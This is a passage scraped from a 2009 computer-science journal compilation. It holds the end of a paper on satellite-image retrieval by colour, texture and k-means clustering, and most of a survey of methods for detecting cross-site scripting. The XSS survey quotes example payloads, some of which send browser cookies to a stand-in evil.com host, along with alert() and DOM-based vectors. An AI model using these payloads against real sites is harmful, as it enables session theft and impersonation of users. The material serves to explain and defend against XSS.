The system in [6] attempt to overcome previous
method limitations of global based retrieval systems by
representing images as collections of regions that may
correspond to objects such as flowers, trees, skies, and
mountains. This system applies image segmentation [7]
to decompose an image into regions, which correspond
to physical objects (trees, people, cars, flowers) if the
decomposition is ideal. The feature descriptors are
extracted on each object instead of global image. Color
19 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 26/215
(IJCSIS) International Journal of Computer Science and Information Security, Vol. 4, No. 1 & 2, 2009
and texture features are extracted on each pixel that
belongs to the object, and each object is described by
the average value of these pixel features. In this paper
color and texture feature extraction, clustering and
similarity matching is used.
III. METHODOLGY
A system is developed for image retrieval. In thisan image database of LISS III sensor is used. LISS III
has a spatial resolution of 23m and a swath width of
140 km. Then the query image is taken and images
similar to the query images are found on the basis of
colour and texture similarity. The three main tasks of
the system are:
1. Colour & Texture Feature Extraction.
2. K-means clustering to form groups.
3. Similarity distance computation between the
query image and database images.
A. Feature Extraction
We have used the approach of Li and Wang [1]
and Zhang [9]. The image is partitioned into 4 by 4
blocks, a size that provides a compromise between
texture granularity, segmentation coarseness, and
computation time. As part of pre-processing, each 4x4
block is replaced by a single block containing the
average value of the 4 by 4 block.
To segment an image into objects, six features are
extracted from each block. Three features are color
features, and the other three are texture features. The
HSV color space is selected during color feature
extraction due to its ability for easy transformationfrom RGB to HSV and vice versa. The quantization of
HSV can produce a collection of colors that is also
compact and complete [6]. These features are {H, S,
and V} that are extracted from the RGB colour image.
To obtain the texture features, Haar wavelet
transformation is used. The Haar wavelet is
discontinuous and resembles a step function. It
represents the energy in high frequency bands of the
Haar wavelet transform. After a one-level wavelet
transform, a 4 by 4 block is decomposed into four
frequency bands, each band containing a 2 by 2 matrix
of coefficients. Suppose the coefficients in the HL bandare {ck+i, ck,j+1, ck+1,j, ck+1,j+1}. Then, the feature of the
block in the HL band is computed as:
The other two features are computed similarly
in the LH and HH bands. The three features of the
block are {HL, LH and LL} [6].
B. K-Means Clustering
A cluster is a collection of data objects that are
similar to one another with in the same cluster and are
dissimilar to the objects in the other clusters. It is the
best suited for data mining because of its efficiency in
processing large data sets. It is defined as follows:
The k-means algorithm is built upon four basic
operations:
1. Selection of the initial k-means for k-clusters.
2. Calculation of the dissimilarity between an
object and the mean of a cluster.
3. Allocation of an object of the cluster whose
mean is nearest to the object.
4. Re-calculation of the mean of a cluster from
the object allocated to it so that the intra
cluster dissimilarity is minimized.
After obtaining the six features from all pixels on
the image and storing these in an array k-means
clustering is performed using Borglet’s implementation
of K-means clustering [10] to group similar pixel
together and form k = 3 clusters. The same procedure is
applied on every given image.
The advantage of K-means algorithm is that it
works well when clusters are not well separated from
each other, which is frequently encountered in images.
However, k-means requires the user to specify the
initial cluster centers.
C. Similarity Matching
Many similarity measures have been developed for
image retrieval based on empirical estimates of the
feature extraction. Euclidean Distance is used for
similarity matching in the present system.
The Euclidean distance between two points P =
(p1, p2, ……, pn) and Q = (q1,q2, ……, qn), in Euclidean n-
space, is defined as:
System calculated 6 features of each image
objects and then calculates the Euclidean distance of
objects of given query image to all three objects of the
images in the database.
The distance between two images i.e between
query image Q and other image A having three
20 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 27/215
(IJCSIS) International Journal of Computer Science and Information Security, Vol. 4, No. 1 & 2, 2009
clustered objects as Q/1, Q/2, Q/3 and A/1, A/2, we
respectively, have approximated A/3 as follows:
1. Find the Euclidean distance between objects
Q/1 to all three objects of A. Let these
distances are d1, d2, d3.
2. Find the Euclidean distance between objects
Q/2 to all three objects A. Let these distances
is d4, d5, and d6.
3. Find the Euclidean distance between objectQ/3 to all three objects A. Let these distances
are d7, d8, d9.
4. Take M1 as minimum of the three distances
d1, d2, and d3.
5. Take M2 as minimum of the three distances
d4, d5, and d6.
6. Take M3 as minimum of the three distances
d7, d8, and d9.
7. Take the final distance between Q and A as
the average of M1, M2, M3 i.e.
Distance (Q, A) = (M1+M2+M3)/3.
IV. EXPERIMENTAL PLAN
The image retrieval system is implemented using
MATLAB image processing tools and statistical tools.
For the experiment, system use 12 remote sensing
images of urban area obtained from LISS III sensors of
128x128 pixels (Figure 4.1) to perform image retrieval.
A. Feature Extraction
Using MATLAB image processing tools,
following steps are done for feature extraction:
1. Color and texture features from each pixel are
extracted as described in 3.1 (H,S,V for colourand HL, HH, LH for texture).
2. The output of MATLAB code in step one are
saved in excel file as an array containing 3
columns of color features and 3 columns of
texture features and rows of the total number
of pixel on each image.
B. K-Means Clustering
Clustering the pixel values obtained from 4.1 using
k-means to group similar features together. A sample is
shown in table 4.1 of image 1. As can be seen in this
table pixel 1 to pixel 17 belongs to cluster 2 and pixel
18 belongs to cluster 1. The results are shown in table4.1.
Fig: 4.1 Images taken as example images
PNo H S V HL LH HH C1 C2 C3
1 0 0.12 0.44 -1 1 0 0 1 0
2 0.7 0.05 0.66 0 -1 1 0 1 0
3 0.86 0.08 0.76 0 -1 1 0 1 0
4 0.61 0.11 0.8 -32 32 32 0 1 0
5 0.7 0.09 0.87 -32 32 32 0 1 0
6 0.66 0.08 0.9 -33 -31.5 -31.5 0 1 0
7 0.59 0.13 0.78 31 72 32 0 1 0
8 0.56 0.17 0.75 31 72 32 0 1 0
9 0.6 0.1 0.67 0 0 142 0 1 0
10 0.51 0.09 0.64 0 0 142 0 1 0
11 0.54 0.08 0.58 -20 21.5 162 0 1 0
12 0.43 0.2 0.49 -20 21.5 162 0 1 0
13 0.47 0.4 0.64 20 20 -159 1 0 0
14 0.48 0.39 0.52 20 20 -159 1 0 0
15 0.47 0.2 0.38 1 -0.5 0.5 0 1 0
16 0.75 0.04 0.42 1 -0.5 0.5 0 1 0
17 0.97 0.15 0.57 2 -0.5 -0.5 0 1 0
18 0.96 0.21 0.66 -4 -136 -2.5 1 0 0
Table 4.1 Clustering Result
Table 4.2: Distance between image 1 and all other images
1 2 3 4 5 6 7 8 9 10 11 12 1 0 0.21 0.08 0.18 0.17 0.19 0.17 0.17 0.27 0.16 0.17 0.21
21 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 28/215
(IJCSIS) International Journal of Computer Science and Information Security, Vol. 4, No. 1 & 2, 2009
C. Similarity Matching
Images similar to the query image are retrieved. The
distance of image 1 is calculated from all the images
using Euclidean distance. The final distance between
the query image1 and the other entire images in
database is shown in table 4.2.
Distance of image 1 to image 2 is 0.211575 while the
distance of image 1 to image 7 is 0.174309.
Consider Image 4 as Query, the table 4.3 shows the
distances (threshold between 0 and 0.1) with the closest
images. As it is clear from the table that image 11 is
closest to image 4.
Image 4
Image 5
Image 6
Image 10
Image 11
0 0.079 0.097 0.11 0.077 Table 4.3: Distance between image 4 and all other
similar images.
Fig: 4.2: Similar images of query image 4.
Consider Image 3 as Query, table 4.4 shows the
distances (between 0 and 0.2) with the closest images.
It is clear from the table that image 3 is closest to
image 1.
Image 3 Image 1 Image 2 Image 12 0 0.08195 0.19374 0.173131 Table 4.4: Distance between image 3 and all other
similar images
5. CONCLUSION
For retrieving similar images to a given query image
we have tried to perform the segmentation of images
using color & texture feature and then clustering of
image features and finally calculate the similarity
distance. Color Feature Extraction is done by HSV
color space and texture feature extraction is done by
haar wavelet transformation. Grouping of objects in the
data is performed using K-means clustering algorithm.
Similarity matching of images is based on Euclidean
Distance. We get fruitful results on the example images
used in the experiments. We can use this technique for
mining similar images based on content and knowledge
base for finding vegetation or water or building areas.
6. REFERENCES
[1] Li, J., Wang, J. Z. and Wiederhold, G.,
“Integrated Region Matching for Image
Retrieval,” ACM Multimedia, 2000, p. 147-
156.
[2] Flickner, M., Sawhney, H., Niblack, W.,
Ashley, J., Huang, Q., Dom, B., Gorkani, M.,
Hafner, J., Lee, D., Petkovic, D., Steele, D.
and Yanker, P., “Query by image and video
content: The QBIC system,” IEEE Computer ,
28(9), 1995,pp.23-32
[3] Pentland, A., Picard, R. and Sclaroff S.,
“Photobook: Contentbased manipulation of image databases”, International Journal of
Computer Vision, 18(3), 1996, pp.233–254
[4] Smith, J.R., and Chang, S.F., “Single color
extraction and image query,” In Proceeding
IEEE International Conference on Image
Processing, 1997, pp. 528–531
[5] Gupta, A., and Jain, R., “Visual information
retrieval,” Comm. Assoc. Comp. Mach., 40(5),
1997, pp. 70–79
[6] Eka Aulia, “Heirarchical Indexing for Regionbased image retrieval”, A thesis Submitted to
the Graduate Faculty of the Louisiana State
University and Agricultural and Mechanical
College.
[7] Shi, J., and Malik, J., “Normalized Cuts and
Image Segmentation,” Proceedings Computer
Vision and Pattern Recognition, June, 1997,
pp. 731-737
[8] Smith, J., “Color for Image Retrieval”, Image
Databases: Search and Retrieval of Digital
Imagery, John Wiley & Sons, New York, 2001,pp.285-311
[9] Zhang, R. and Zhang, Z., (2002), “A
Clustering Based Approach to Efficient Image
Retrieval,” Proceedings of the 14th IEEE
International Conference on Tools with
Artificial Intelligence, pp. 339
22 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 29/215
(IJCSIS) International Journal of Computer Science and Information Security, Vol. 4, No. 1 & 2, 2009
[10] http://fuzzy.cs.uni-
magdeburg.de/~borgelt/software for kmeans
clustering software.
23 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 30/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009
Consideration Points: Detecting Cross-Site Scripting
Suman Saha
Dept. of Computer Science and Engineering
Hanyang UniversityAnsan, South Korea
sumsaha@gmail.com
Abstract—Web application (WA) expands its usages to provide
more and more services and it has become one of the mostessential communication channels between service providers andthe users. To augment the users’ experience many webapplications are using client side scripting languages such as
JavaScript but this growing of JavaScript is increasing serioussecurity vulnerabilities in web application too, such as cross-sitescripting (XSS). In this paper, I survey all the techniques thosehave been used to detect XSS and arrange a number of analyses
to evaluate performances of those methodologies. This paperpoints major difficulties to detect XSS. I don’t implement anysolution of this vulnerability problem because; my focus is forreviewing this issue. But, I believe that this assessment will becooperative for further research on this concern as this treatise
figure out everything on this transcendent security problem.
Keywords- cross-site scripting, injection attack, javascript,
scripting languages security, survey, web application security
I. I NTRODUCTION
In this modern world, web application (WA) expands itsusages to provide more and more services and it has becomeone of the most essential communication channels between
service providers and the users. To augment the users’experience many web applications are using client sidescripting languages such as JavaScript but this growing of JavaScript is increasing serious security vulnerabilities in webapplication too. The topmost threat among thosevulnerabilities is Cross-site scripting (XSS). The 21.5%among newly reported vulnerabilities were XSS, making it themost frequently reported security threat in 2006 [29, 30].
A class of scripting code is injected into dynamicallygenerated pages of trusted sites for transferring sensitive datato any third party (i.e., the attacker’s server) and avoidingsame-origin-policy or cookie protection mechanism in order toallow attackers to access confidential data. XSS usually affectsvictim’s web browser on the client-side where as SQLinjection, related web vulnerability is involved with server-side. So, it is thorny for an operator of web application to tracethe XSS holes. Moreover, no particular application knowledgeor knack is required for any attacker to reveal the exploits.Additionally, several factors figure out in Wassermann andSu’s paper those contribute to the prevalence of XSSvulnerabilities [29]. First, the system requirements for XSS areminimal. Second, most web application programminglanguages provide an unsafe default for passing untrustedinput to the client. Finally, proper validation for untrusted
input is difficult to get right, primarily because of the many,often browse-specific, ways of invoking the JavaScriptinterpreter. Therefore, we may say, inadequate validation of user’s input is the key reason for Cross-site scripting (XSS)and effective input validation approach can be introduced todetect XSS vulnerabilities in a WA. But it’s not always true. Ifound a number of situations during my survey, only inputvalidation is not satisfactory to prevent XSS. Severaltechniques have been developed to detect this injection
problem. Some of those are dynamically and some of those arestatically handled. Every researcher tried to present morecompetent and effectual methodology than previous work. Butin my point of view, every method has pros and cons.
The rest of this paper is structured as follows. In Section II,this paper presents nuts and bolts of this area and tries to picture out why cross-site scripting is more tricky and uncannythan other injection problems. I review several research papers, journals, related websites, and more than thousand XSS vectorsand summarize all of them under one frame in Section III.After reviewing of existing systems I found atleast one problemfrom each system and categorize major problems into five broad categories. The brief presentation of all those categories
with some realistic examples is placed in section IV. Analyzingof well known ten methodologies those were used to detectcross-site scripting and figure out their real looks in regardingto my five problem categories in section V, and finally, SectionVI concludes.
II. XSS ATTACK TYPES
There are three distinct types of XSS attacks: non- persistent , persistent , and DOM-based [8].
Non-persistent cross-site scripting vulnerability is the mostcommon type. The attack code is not persistently stored, but,instead, it is immediately reflected back to the user. For instance, consider a search form that includes the search query
into the page with the results, but without filtering the queryfor scripting code. This vulnerability can be exploited, for example, by sending to the victim an email with a specialcrafted link pointing to the search form and containing amalicious JavaScript code. By tricking the victim into clickingthis link, the search form is submitted with the JavaScript codeas a query string and the attack script is immediately sent back to the victim, as part of the web page with the result. Asanother example, consider the case of user who accesses the popular trusted.com web site to perform sensitive operations
24 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 31/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009
(e.g., on-line banking). The web-based application ontrusted.com uses a cookie to store sensitive sessioninformation in the user’s browser. Note that, because of thesame origin policy, this cookie is accessible only to JavaScriptcode downloaded from a trusted.com web server. However,the user may be also browsing a malicious web site, saywww.evil.com, and could be tricked into clicking on thefollowing link:
12345678
<a href = “http://www.trusted.com/<SCRIPT>
document. location =‘http://www.evil.com/steal-cookie.php?’+document.cookie;
</SCRIPT>”>Click here to collect price.
</a>
Figure 1. JavaScript code in HTTP request
When the user clicks on the link, an HTTP request is sent by the user’s browser to the www.trusted.com web server,requesting the page:
12345
<SCRIPT>document. location =
‘http://www.evil.com/steal-cookie.php?’+document.cookie;
</SCRIPT>”>
Figure 2. JavaScript code, treating as requested link
The trusted.com web server receives the request andchecks if it has the resource that is being requested. When thetrusted.com host does not find the requested page, it willreturn an error page message. The web server may also decideto include the requested file name (which is actually script)
will be sent from the trusted.com web server to the user’s browser and will be executed in the context of the trusted.comorigin. When the script is executed, the cookie set bytrusted.com will be sent to the malicious web site as a parameter to the invocation of the steal-cookie.php server-sidescript. The cookie will be saved and can be used by the owner of the evel.com site to impersonate the unsuspecting user withrespect to trusted.com.
Persistent type stores malicious code persistently in aresource (in a database, file system, or other location)managed by the server and later displayed to users without being encoded using HTML entities. For instance, consider anonline message board, where users can post messages andothers can access them later. Let us assume further that the
application does not remove script contents from postedmessages. In this case, the attacker can craft a message similar to the next example.
This message contains the malicious JavaScript code thatthe online message board stores in its database. A visiting user who reads the message retrieves the scripting code as part of the message. The user’s browser then executes the script,which, in turn sends the user’s sensitive information from hissite to the attacker’s site.
Yahoooo! You Won Prize. Click on HERE to verify.
12345
<SCRIPT>document. images[0].src =
http://evil.com/images.jpg?stolencookie +document.cookie;
</SCRIPT>
Figure 3. Persistent XSS vector
DOM-based cross-site scripting attacks are performed bymodifying the DOM “environment” in the client side insteadof sending any malicious code to server. So the server doesn’tget any scope to verify the payload. The following exampleshows that a sign (#) means everything following it isfragment, i.e. not part of the query.
12
http://www.evil.com/Home.html#name=<SCRIPT>alert(‘XSS’)</SCRIPT>
Figure 4. DOM-based XSS vector
Browser doesn’t send fragment to server, and thereforeserver would only see the equivalent of
http://www.evil.com/Home.html, not the infected part of the payload. We see, therefore, that this evasion technique causesthe major browsers not to send the malicious payload to theserver. As a consequence, even the well-planned XSS filters become impotent against such attacks.
As Grossman, RSNAKE, PDP, Rager, and Fogie point out,cross-site scripting is a variegated problem that is not easy tosolve anytime soon [14]. There is no quick fix that isacceptable for the majority like other security related issues.They figure out the problem as two-fold. First, the browsers arenot secure by design. They are simply created to produceoutputs with respect to requests. It is not the main duty of any browser to determine whether or not the piece of code is doing
something malicious. Second, web application developers areunable to create secure sites because of programming knackslacking or time margins. As a consequence, attackers getchances to exploit the applications’ vulnerabilities. Hence,now, the users are stuck between two impossible states.
III. EXISTING METHODS
A. Dynamic Approach
1) Vulnerability Analysis based Approach:
a) Interpreter-based Approaches: Pietraszek, andBerghe use approach of instrumenting interpreter to track untrusted data at the character level and to identify
vulnerabilities they use context-sensitive string evaluation ateach susceptible sink [18]. This approach is sound and candetect vulnerabilities as they add security assurance bymodifying the interpreter. But approach of modifyinginterpreter is not easily applicable to some other web programming languages, such as Java (i.e., JSP and servlets)[2].
b) Syntactical Structure Analysis: A successful injectattack changes the syntactical structure of the exploited entity,
25 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 32/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009
stated by Su, and Wassermann in [2] and they present anapproach to check the syntactic structure of output string todetect malicious payload. Augment the user input with meta-data to track this sub-string from source to sinks. This meta-data help the modified parser to check the syntactical structureof the dynamically generated string by indicating end and start position of the user given data. If there is any abnormality thenit blocks further process. These processes are quite success
while it detect any injection vulnerabilities other than XSS.Only checking the syntactic structure is not sufficient to prevent this sort of workflow vulnerabilities that are caused bythe interaction of multiple modules [25].
2) Attack Prevention Approach:
a) Proxy-based Solution: Noxes, a web proxy protectsagainst transferring of sensitive information from victim’s siteto third party’s site [13]. This is an application-level firewallto block and detect malware. User is provided with fine-grained control over each and every connection which arecoming to or leaving from local machine. If any connection ismismatched with the firewall’s rules then firewall prompts theuser to decide whether the connection needs to be blocked or
allowed. Almost similar approaches apply in [12], [24], and[27]. Blacklisting the link is not sufficient technique to preventcross-site Scripting attacks, e.g., those don’t go against sameorigin policy, as was the case of the Samy worm [10]. Huanget al. state, proxy-based solution doesn’t present any procedureto identify the errors and it needs watchful configuration [6].These sorts of systems protect the unpredictable link withoutexamining the fault which may increase the false positive [28].
b) Browser-Enforced Embedded Policies: A white listof all benign scripts is given by the web application to browser to protect from malicious code [10]. This smart idea allowsonly listed scripts to run. There is no similarity betweendifferent browsers’ parsing mechanism and as a consequence,
successful filtering system of one browser may unsuccessfulfor another. So, the method of this paper is quite successfulagainst this situation but enforcing the policy to browser requires a modification in that. So, it suffers for scalability problem from the web application’s point of view [11]. Everyclient need to have this modification version of the browser.
B. Static Analysis
1) Taint Propagation Analysis: Lots of static and dynamic
approaches use taint propagation analysis using data flow
analysis to track the information flow from source to sink [4,
6, 9, 22, and 26]. The underlying assumption of this technique
is as follows: if a sanitization operation is done on all paths
from source to sinks then the application is secure [19].Keeping faith on user’s filter and not checking the sanitization
function at all is not a good idea at all because some XSS
vectors can bypass many strong filters easily. Thus it doesn’t
provide strong security mechanism [2].
2) String Analysis: The study of string analysis grew out
of the study of text processing programs. XDuce, a language
designed for XML transformations uses formal language (e.g.,
regular languages) [31]. Christensen, Mǿller, and
Schwartzbach introduced the study of static string analysis for
imperative (and real world) languages by showing the
usefulness of string analysis for analyzing reflective code in
Java programs and checking for errors in dynamically
generated SQL queries [7]. They designed an analysis for Java
using finite state automata (FSA) as its target language
representation. They also applied techniques from
computational linguistics to generate good FSA approximation
of CFGs [32]. Their analysis, however, does not track the
source of data, and because it must determine the FSA
between each operation, it is less efficient that other string
analyzes and not practical for finding XSS vulnerabilities [29].
Minamide followed same technique to design a string analysis
for PHP that does not approximate CFGs to FSA. His
proposed technique that checks the whole document for the
presence of the “<script>” tag. Because web applications often
include their own scripts, and because many other ways of
invoking the JavaScript interpreter exist, the approach is not
practical for finding XSS vulnerabilities.
3) Preventing XSS Using Untrusted Scripts: Using a list of
untrusted scripts to detect harmful script from user given datais well- known technique. Wassermann and Su’s recent work
[29] is a shadow of this process. They build policies and
generate regular expressions of untrusted tags to check
whether it has non-empty intersection between generated
regular expression and CFG, generate from String taint static
analysis, if so, they take further action. We believe that using
any list of untrusted script is easy and poor idea. Same opinion
is stated in the document of OWASP [17]. In the document, it
was mentioned, “Do not use “blacklist” validation to detect
XSS in input or to encode output. Searching for and replacing
just a few characters (“<” “>” and other similar characters or
phrases such as “script”) us weak and has been attacked
successfully. XSS has a surprising number of variants thatmake it easy to bypass blacklist validation.”
4) Software Testing Techniques: Y. Huang, S. Huang, Lin,
and Tsai use number of software-testing techniques such as
black-box testing, fault injection, and behavior monitoring to
web application in order to deduce the presence of
vulnerabilities [15]. It’s a combination of user-behavior
simulation with user experience modeling as black-box testing
[28]. Similar approaches are used in several commercial
projects such as APPScan [21], WebInspect [20], and ScanDo
[23]. Since, these approaches are applied to identify errors in
development cycle, so these may unable to provide instant
Web application protection [6] and they cannot guarantee the
detection of all flaws as well [27].
5) Bounded Model Checking: Huang et al. use
counterexample traces to reduce the number of inserted
sanitization routines and to identify the cause of errors that
increase the precision of both error reports and code
instrumentation [28]. To verify legal information flow within
the web application programs, they assign states those
represent variables’ current trust level. Then, Bounded Model
Checking technique is used to verify the correctness of all
26 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 33/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009
possible safety states of the Abstract Interpretation of the
program. In their method, they leave out alias analysis or
include file resolution issues those are some of major
problems in most of the current systems [26].
C. Static and Dynamic Analysis Combination
1) Lattice-based Analysis: The WebSSARI is a tool,
combination of static and runtime features that apply static taint
propagation analysis to find security vulnerabilities [6]. On the basis of lattice model and typestate this tool uses flow
sensitive, intra-procedural analysis to detect vulnerability. This
tool automatically inserts runtime guards, i.e., sanitization
routines when it determines that tainted data reaches sensitive
functions [25]. The major problems of this method are that it
provides large number of false positive and negative due to its
intraprocedural type-based analysis [4]. Moreover, this method
considers the results from users’ designed filters are safe.
Therefore, it may miss real vulnerabilities. Because, it may be
possible that designated filtering function is not able to detect
the malicious payload.
IV. CONSIDERATION POINTS TO DETECT XSS
After close examination of existing detectors, I found atleast one problem from each detector. Those problems arecategorized into five categories. A brief description of thesecategories along with some realistic examples is placed in thissection.
A. Insecure JavaScript Practice
Yue et al. characterize the insecure engineering practice of JavaScript inclusion and dynamic generation at differentwebsites by examining severity and nature of securityvulnerabilities [3]. These two insecure practices are the mainreasons for injecting malicious code into websites and creating
XSS vectors. According to their survey results, 66.4% of measured websites has insecure practice of JavaScriptinclusion using src attribute of a script tag to include aJavaScript file from external domain into top-level domaindocument of a web page. Top-level document is documentloaded from URL displayed in a web browser’s address bar.
Two domain names are regarded as different only if, after discarding their top-level domain names (e.g., .com) and theleading name “www” (if existing); they don’t have anycommon sub-domain name. For instance, two domain nameare regarded as different only if the intersection of the two sets{ d1sub2.d1sub1} and { d2sub3.d2sub2.d2sub1} is empty [3].
1. www.d1sub2.d1sub1.d1tld
2. d2sub3.d2sub2.d2sub1.d2tld
79.9% of measured websites uses one or more types of JavaScript dynamic generation techniques. In case of dynamicgeneration techniques, document.write(), innerHTML, eval()functions are more popular than some other secure methods.Their results show 94.9% of the measured website register various kinds of event handlers in their webpage. Dynamicallygenerated Script (DJS) instance is identified in different waysfor different generation techniques. For the eval() function, the
whole evaluated string content is regarded as a DJS instance.Within the written content of the document.write() method andthe value of the innerHTML property, a DJS instance can beidentified by from three source [3].
Between a pair of <SCRIPT> and </SCRIPT> tags
In an event handler specified as the value of anHTML attribute such as onclick or onmouseover;
In a URL using the special javascript:protocolspecifier.
I investigated more than 100 home pages of uniquewebsites manually (reading source file) to make a smallmeasurement. My measurement results almost reflect their outcome.
TABLE I. I NSECURE JAVASCRIPT PRESENCE IN HTML FILES
To eliminate this risk, developers have to avoid insecure practice of JavaScript, such as they need to avoid externalJavaScript inclusion using internal JavaScript files, eval()function need to be replaced with some other safe function [3].
B. Malicious code between Static Scripts
User input between any existing scripting codes is vitalissue while detecting XSS. It’s really hard to find any methodfrom existing systems that can solve this dilemmaappropriately. There are two types of scripting code in anywebpage. Some of them are static and some of them aredynamic (composed during runtime). Let’s begin the discus onthis issue with one example.
1 <SCRIPT> var a = $ENV_STRING; </SCRIPT>
Figure 5. User given data between static script code
In the above example, both starting both starting andending tag of script are static and the user input is sandwiched between them that make the scripting code executable. But problem is that any successful injection in this context maycreate XSS vector. All strong filters of the existing systems tryto find malicious code from the user input. This kind of situation in static code may help attackers to circumvent anydetecting filter. For instance, the Samy MySpaceWormintroduced keywords prohibited by the filters(innerHTML) through JavaScript code that resulted the outputas the client end (eval(‘inner’+’HTML’)) [10]. On the other hand we cannot eliminate any static scripting code whilefiltering because they are legitimate and there may be a safeuser input between those legitimate codes. So it is hard toisolate and filter input that builds such construct withoutunderstanding the syntactical context in which they used [11].So meaning of the syntax is a vital concern while filtering.
No of
HTMLfiles
JS
DJS
eval document.write innerHTML
106 83 19 92 7
27 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 34/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009
C. Browser-specific Problems
The diversity of browser characteristics is one of the major problems while detecting vulnerabilities. Different browser parses web page differently. Some of them follow the rules of W3C and some of them it’s own. So, this multifaced of browsers makes many filters weak. Moreover, browser cannotdistinguish between crafted scripts with malicious inputs and benign scripts. They are always ready to execute all scripts
which is a cause of XSS attacks. For instance, some browser accept newline or white space in “ JavaScript ”, portion of a JavaScript:URL, some don’t.
12
<img src = ‘JavaScript:alert(1)’>
Figure 6. Newline between JavaScript
This will result in script execution for some browsers.Vector rely on the “ad-hoc(quirk)” behavior of the FirefoxHTML parser e.g., only the Firefox executes –
12
<SCRIPT/XSSSRC = http://evil/e.js></SCRIPT>
Figure 7. SCRIPT followed by non-character
Let’s look another case,
123
preg_replace(“/\<SCRIPT (.*?)\.(.*?)\<\/SCRIPT(.*?)\>/i”, “SCRIPTBLOCKED”, $VALUE);
Figure 8. Detect closing SCRIPT tag
The above function preg_replace looks for a closing scripttag. Some browsers do not allow any scripting code withoutany closing script tag. But it’s not true for all. Most of the browsers accept scripting code without closing tag and
automatically insert the missing tag [19]. This generosity of the browser helps any attacker to insert malicious code easily.So, Proper validation for malicious payload is difficult to getright. The nature of different browser’s parsing mechanismsmust be a vital concern while developing any tool for detecting untrusted user input. Some of existing systems triedto overcome this problem but I think that those are not perfectfor all browsers.
D. DOM-based Problems
One of the crucial problems of most existing systems isthey cannot detect DOM-based XSS. So only identifyingstored and reflected XSS is not sufficient for preventing all of XSS domain and according to Amit Klein’s article, DOM-
based is one of the upcoming injection problems in web world because nowadays, most of the issues related to other type of XSS problems are being cleaned up on major websites [16].So, bad guys will try for third type of XSS vulnerability. Wealready know, DOM-based XSS vector does not need toappear on the server and it’s not easy for a server to identify.So, attackers get extra advantage with this type of XSSvulnerability. DOM-based XSS is introduced by Amit Klein inhis article [16] and this type XSS can be hidden in the
JavaScript code and many strong web application firewalls failto filter this malicious code.
In the eXtensible Markup Language (XML) world, thereare mainly two types of parser, DOM and SAX. DOM-based parsers load the entire document as an object structure, whichcontains methods and variables to easily move around thedocument and modify nodes, values, and attributes on the fly.Browsers work with DOM. When a page is loaded, the
browser parses the resulting page into an object structure. ThegetElementByTagName is a standard DOM function that isused to locate XML/HTML nodes based on their tag name.
Let’s start to discuss about on this topic deeply with AmitKlein given example. Say, the content of http://www.vulnerable.site/welcome.html as follows:
123456
7891011
<HTML><TITLE> Welcome! </TITLE><SCRIPT>
var pos =document.URL.indexof(“name=”)+5document.write(document.URL.substring
(pos, document.URL.length));</SCRIPT><BR>
Welcome to our System
</HTML>
Figure 9. HTML page
If we analyze the code of the example, we will see thatdeveloper has forgotten to sanitize the value of the “name” get parameter, which is subsequently written inside the documentas soon as it is retrieved. The result of this HTML page will behttp://vulnerable.site/welcome.html?name= Joe (if user inputis ‘Joe’). However, if the user input is any scripting code that
would result in an XSS situation. e.g.;123
http://vulnerable.site/welcome.html?name=<SCRIPT> alert(document.cookie)</SCRIPT>
Figure 10. DOM-based XSS vector
Many people may disagree with this statement and mayargue that still, the malicious code is sending to the server, andany filter can be used in the server to identify it. Let’s see anupdate version of previous example.
12
3
http://vulnerable.site/welcome.html#name=<SCRIPT> alert(document.cookie)
</SCRIPT>
Figure 11. DOM-based XSS vector with (#) sign
Here sign (#) right after the file name used as fragmentstarter and anything beyond this is not a part of query. Most of the well-known browsers do not send the fragment to server.So actual malicious part of the code is not appeared to theserver, and therefore, the server would see the equivalent of http://www.vulnerable.site/welcome.html . More scenarios on DOM-based XSS are in Amit Klein’s article [16]. He suggests
28 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 35/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009
that minimizing insecure JavaScript practice in code mayreduce the chances of DOM-based XSS. Web developer must be very careful when relying on local variables for data andcontrol and should give attention on the scenarios whereinDOM is modified with the user input.
Automated testing has only very limited success atidentifying and validating DOM based XSS as it usuallyidentifies XSS by sending a specific payload and attempts to
observe it in the server response. This may work fine for Fig. 9if we exclude the idea of (#) sign but may not work in thefollowing contrived case:
12345678910111213
<SCRIPT>var navAgt = navigator.userAgent;if (navAgt.indexOf(“MSIE”)!=-1){
document.write(“You are using IE and visitingsite” +document.location.href+“.”);
}else{
document.write(“You are using an unknown browser.”);
}</SCRIPT>
Figure 12. DOM-based XSS vector
For this reason, automated testing will not detect areas thatmay be susceptible to DOM based XSS unless the testing toolcan perform addition analysis of the client side code [34].Manual testing should therefore be undertaken and can bedone by examining areas in the code where parameter arereferred to that may be useful to attackers. Examples of suchareas include places where code is dynamically written to the page and elsewhere where the DOM is modified or even
where scripts are directly executed.
E. Multi-Module Problems
